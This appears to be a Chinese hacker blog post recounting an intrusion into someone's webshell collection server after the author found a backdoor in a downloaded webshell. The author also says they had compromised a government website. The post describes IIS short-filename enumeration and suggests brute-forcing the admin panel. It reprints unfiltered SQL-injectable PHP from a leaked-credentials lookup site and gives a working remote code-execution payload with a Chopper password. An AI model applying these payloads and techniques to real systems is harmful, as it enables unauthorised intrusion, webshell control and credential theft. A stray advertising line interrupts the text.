滲透某Webshell箱子全過程,
前幾天拿了一個gov的站 第二天網站居然被掛上博彩鏈接了。
明明修復漏洞了 想想還是webshell出了問題
webshell是之前拿了一個dede看到裡面有前輩留下後門 功能和界面都不錯就下載下來了
打開shell發現最底部居然有一段ASCII加密的代碼 之前沒注意
解密出來 果然是一個後門程序
然後訪問這個網站 為自己的shell討回公道。
居然是某大黑闊的博客 測試發現他這個伺服器有iis短文件名漏洞。
利用~逐字猜解可以遍歷出所有目錄。
網上找了好多工具效果都不是很好 不過最後遍歷出箱子的地址
Hire Workers Online!
後台寫的比較粗糙 感覺 burp爆破就可以
不過沒有站長的相關信息 首頁有一個社工庫查詢 想試一下 數據強大不
記得這個社工庫有注入? 翻了半天百度發現自己雲盤裡就存過
鏈接 :http://pan.baidu.com/s/1qYeuaYw 用這套源碼小夥伴修復下吧
if(!empty($_REQUEST[act])){$sql="SELECT * FROM `{$v}` WHERE username={$_REQUEST[act]}";$res=mysql_query($sql);$title=<h3 stylex="color:green;">.&nbsp;.FROM : .$v.</h3>;$i=0; while($row=mysql_fetch_assoc($res)){ // echo <pre>; // var_dump($row); // echo </pre>;$i++; if($i > 1){$title=null; }echo $title;echo &nbsp;.&nbsp;.&nbsp;.username. : .$row[username];echo &nbsp;.&nbsp;.&nbsp;.password. : .$row[password];echo &nbsp;.&nbsp;.&nbsp;.email. : .$row[email];echo <br/>;
沒有對任何參數過濾
前台任意代碼執行: ?act={${eval%28$_POST[x]%29}} 菜刀鏈接密碼x
一個萬年沒人訪問的站 居然放個社工庫 給自己看?
動態目錄貌似沒許可權,不過至少拿到了管理密碼
發現這個箱子還是稍微比較大 存活的shell就有2000多 而且全部被掛上了博彩鏈接。
因為沒有許可權 部分敏感地區做了打馬處理,等下次全站getshell 再截圖出來。
推薦閱讀: